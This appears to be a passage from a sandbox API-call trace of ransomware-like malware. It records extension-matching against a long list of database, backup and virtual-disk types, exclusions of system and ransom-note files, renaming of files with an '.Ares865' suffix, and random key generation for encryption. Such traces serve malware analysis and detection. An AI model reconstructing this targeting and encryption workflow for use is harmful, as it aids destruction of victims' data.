(lpString1="dll", lpString2="adp") returned 1 [0087.471] lstrlenW (lpString="alf") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.471] lstrlenW (lpString="ask") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.471] lstrlenW (lpString="btr") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.471] lstrlenW (lpString="cat") returned 3 [0087.471] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.471] lstrlenW (lpString="cdb") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.472] lstrlenW (lpString="ckp") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.472] lstrlenW (lpString="cma") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.472] lstrlenW (lpString="cpd") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.472] lstrlenW (lpString="dacpac") returned 6 [0087.472] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.472] lstrlenW (lpString="dad") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.472] lstrlenW (lpString="dadiagrams") returned 10 [0087.472] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.472] lstrlenW (lpString="daschema") returned 8 [0087.472] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.472] lstrlenW (lpString="db-journal") returned 10 [0087.472] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.472] lstrlenW (lpString="db-shm") returned 6 [0087.472] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.472] lstrlenW (lpString="db-wal") returned 6 [0087.472] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.472] lstrlenW (lpString="dbc") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.472] lstrlenW (lpString="dbs") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.472] lstrlenW (lpString="dbt") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.472] lstrlenW (lpString="dbv") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.472] lstrlenW (lpString="dbx") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.472] lstrlenW (lpString="dcb") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.472] lstrlenW (lpString="dct") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.472] lstrlenW (lpString="dcx") returned 3 [0087.472] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.472] lstrlenW (lpString="ddl") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.473] lstrlenW (lpString="dlis") returned 4 [0087.473] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.473] lstrlenW (lpString="dp1") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.473] lstrlenW (lpString="dqy") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.473] lstrlenW (lpString="dsk") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.473] lstrlenW (lpString="dsn") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.473] lstrlenW (lpString="dtsx") returned 4 [0087.473] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.473] lstrlenW (lpString="dxl") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.473] lstrlenW (lpString="eco") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.473] lstrlenW (lpString="ecx") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.473] lstrlenW (lpString="edb") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.473] lstrlenW (lpString="epim") returned 4 [0087.473] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.473] lstrlenW (lpString="fcd") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.473] lstrlenW (lpString="fdb") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.473] lstrlenW (lpString="fic") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.473] lstrlenW (lpString="flexolibrary") returned 12 [0087.473] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.473] lstrlenW (lpString="fm5") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.473] lstrlenW (lpString="fmp") returned 3 [0087.473] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.473] lstrlenW (lpString="fmp12") returned 5 [0087.473] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.473] lstrlenW (lpString="fmpsl") returned 5 [0087.474] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.474] lstrlenW (lpString="fol") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.474] lstrlenW (lpString="fp3") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.474] lstrlenW (lpString="fp4") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.474] lstrlenW (lpString="fp5") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.474] lstrlenW (lpString="fp7") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.474] lstrlenW (lpString="fpt") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.474] lstrlenW (lpString="frm") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.474] lstrlenW (lpString="gdb") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.474] lstrlenW (lpString="gdb") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.474] lstrlenW (lpString="grdb") returned 4 [0087.474] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.474] lstrlenW (lpString="gwi") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.474] lstrlenW (lpString="hdb") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.474] lstrlenW (lpString="his") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.474] lstrlenW (lpString="ib") returned 2 [0087.474] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.474] lstrlenW (lpString="idb") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.474] lstrlenW (lpString="ihx") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.474] lstrlenW (lpString="itdb") returned 4 [0087.474] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.474] lstrlenW (lpString="itw") returned 3 [0087.474] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.474] lstrlenW (lpString="jet") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.475] lstrlenW (lpString="jtx") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.475] lstrlenW (lpString="kdb") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.475] lstrlenW (lpString="kexi") returned 4 [0087.475] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.475] lstrlenW (lpString="kexic") returned 5 [0087.475] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.475] lstrlenW (lpString="kexis") returned 5 [0087.475] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.475] lstrlenW (lpString="lgc") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.475] lstrlenW (lpString="lwx") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.475] lstrlenW (lpString="maf") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.475] lstrlenW (lpString="maq") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.475] lstrlenW (lpString="mar") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.475] lstrlenW (lpString="marshal") returned 7 [0087.475] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.475] lstrlenW (lpString="mas") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.475] lstrlenW (lpString="mav") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.475] lstrlenW (lpString="maw") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.475] lstrlenW (lpString="mdbhtml") returned 7 [0087.475] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.475] lstrlenW (lpString="mdn") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.475] lstrlenW (lpString="mdt") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.475] lstrlenW (lpString="mfd") returned 3 [0087.475] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.475] lstrlenW (lpString="mpd") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.476] lstrlenW (lpString="mrg") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.476] lstrlenW (lpString="mud") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.476] lstrlenW (lpString="mwb") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.476] lstrlenW (lpString="myd") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.476] lstrlenW (lpString="ndf") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.476] lstrlenW (lpString="nnt") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.476] lstrlenW (lpString="nrmlib") returned 6 [0087.476] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.476] lstrlenW (lpString="ns2") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.476] lstrlenW (lpString="ns3") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.476] lstrlenW (lpString="ns4") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.476] lstrlenW (lpString="nsf") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.476] lstrlenW (lpString="nv") returned 2 [0087.476] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.476] lstrlenW (lpString="nv2") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.476] lstrlenW (lpString="nwdb") returned 4 [0087.476] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.476] lstrlenW (lpString="nyf") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.476] lstrlenW (lpString="odb") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.476] lstrlenW (lpString="odb") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.476] lstrlenW (lpString="oqy") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.476] lstrlenW (lpString="ora") returned 3 [0087.476] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.477] lstrlenW (lpString="orx") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.477] lstrlenW (lpString="owc") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.477] lstrlenW (lpString="p96") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.477] lstrlenW (lpString="p97") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.477] lstrlenW (lpString="pan") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.477] lstrlenW (lpString="pdb") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.477] lstrlenW (lpString="pdm") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.477] lstrlenW (lpString="pnz") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.477] lstrlenW (lpString="qry") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.477] lstrlenW (lpString="qvd") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.477] lstrlenW (lpString="rbf") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.477] lstrlenW (lpString="rctd") returned 4 [0087.477] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.477] lstrlenW (lpString="rod") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.477] lstrlenW (lpString="rodx") returned 4 [0087.477] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.477] lstrlenW (lpString="rpd") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.477] lstrlenW (lpString="rsd") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.477] lstrlenW (lpString="sas7bdat") returned 8 [0087.477] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.477] lstrlenW (lpString="sbf") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.477] lstrlenW (lpString="scx") returned 3 [0087.477] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.478] lstrlenW (lpString="sdb") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.478] lstrlenW (lpString="sdc") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.478] lstrlenW (lpString="sdf") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.478] lstrlenW (lpString="sis") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.478] lstrlenW (lpString="spq") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.478] lstrlenW (lpString="te") returned 2 [0087.478] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.478] lstrlenW (lpString="teacher") returned 7 [0087.478] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.478] lstrlenW (lpString="tmd") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.478] lstrlenW (lpString="tps") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.478] lstrlenW (lpString="trc") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.478] lstrlenW (lpString="trc") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.478] lstrlenW (lpString="trm") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.478] lstrlenW (lpString="udb") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.478] lstrlenW (lpString="udl") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.478] lstrlenW (lpString="usr") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.478] lstrlenW (lpString="v12") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.478] lstrlenW (lpString="vis") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.478] lstrlenW (lpString="vpd") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.478] lstrlenW (lpString="vvv") returned 3 [0087.478] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.479] lstrlenW (lpString="wdb") returned 3 [0087.479] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.479] lstrlenW (lpString="wmdb") returned 4 [0087.479] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.479] lstrlenW (lpString="wrk") returned 3 [0087.479] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.479] lstrlenW (lpString="xdb") returned 3 [0087.479] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.479] lstrlenW (lpString="xld") returned 3 [0087.479] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.479] lstrlenW (lpString="xmlff") returned 5 [0087.479] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.479] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.Ares865") returned 80 [0087.479] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.480] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\envelopr.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.480] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14688) returned 1 [0087.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.481] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.481] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.481] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3c60, lpName=0x0) returned 0x15c [0087.483] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3c60) returned 0x190000 [0087.484] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.485] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.485] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.485] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.485] CloseHandle (hObject=0x15c) returned 1 [0087.486] CloseHandle (hObject=0x118) returned 1 [0087.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.486] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xbf60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".") returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="..") returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="windows") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="bootmgr") returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="temp") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="pagefile.sys") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="boot") returned 1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ids.txt") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="ntuser.dat") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="perflogs") returned -1 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="MSBuild") returned -1 [0087.486] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0087.486] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ENVELOPR.DLL.trx_dll") returned 72 [0087.486] lstrcpyW (in: lpString1=0x2cce468, lpString2="GRINTL32.DLL.trx_dll" | out: lpString1="GRINTL32.DLL.trx_dll") returned="GRINTL32.DLL.trx_dll" [0087.486] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0087.486] lstrlenW (lpString="Ares865") returned 7 [0087.486] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.486] lstrlenW (lpString=".dll") returned 4 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".dll") returned 1 [0087.486] lstrlenW (lpString=".lnk") returned 4 [0087.486] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.486] lstrlenW (lpString=".ini") returned 4 [0087.487] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".ini") returned 1 [0087.487] lstrlenW (lpString=".sys") returned 4 [0087.487] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2=".sys") returned 1 [0087.487] lstrlenW (lpString="GRINTL32.DLL.trx_dll") returned 20 [0087.487] lstrlenW (lpString="bak") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.487] lstrlenW (lpString="ba_") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.487] lstrlenW (lpString="dbb") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.487] lstrlenW (lpString="vmdk") returned 4 [0087.487] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.487] lstrlenW (lpString="rar") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.487] lstrlenW (lpString="zip") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.487] lstrlenW (lpString="tgz") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.487] lstrlenW (lpString="vbox") returned 4 [0087.487] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.487] lstrlenW (lpString="vdi") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.487] lstrlenW (lpString="vhd") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.487] lstrlenW (lpString="vhdx") returned 4 [0087.487] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.487] lstrlenW (lpString="avhd") returned 4 [0087.487] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.487] lstrlenW (lpString="db") returned 2 [0087.487] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.487] lstrlenW (lpString="db2") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.487] lstrlenW (lpString="db3") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.487] lstrlenW (lpString="dbf") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.487] lstrlenW (lpString="mdf") returned 3 [0087.487] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.488] lstrlenW (lpString="mdb") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.488] lstrlenW (lpString="sql") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.488] lstrlenW (lpString="sqlite") returned 6 [0087.488] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.488] lstrlenW (lpString="sqlite3") returned 7 [0087.488] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.488] lstrlenW (lpString="sqlitedb") returned 8 [0087.488] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.488] lstrlenW (lpString="xml") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.488] lstrlenW (lpString="$er") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.488] lstrlenW (lpString="4dd") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.488] lstrlenW (lpString="4dl") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.488] lstrlenW (lpString="^^^") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.488] lstrlenW (lpString="abs") returned 3 [0087.488] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 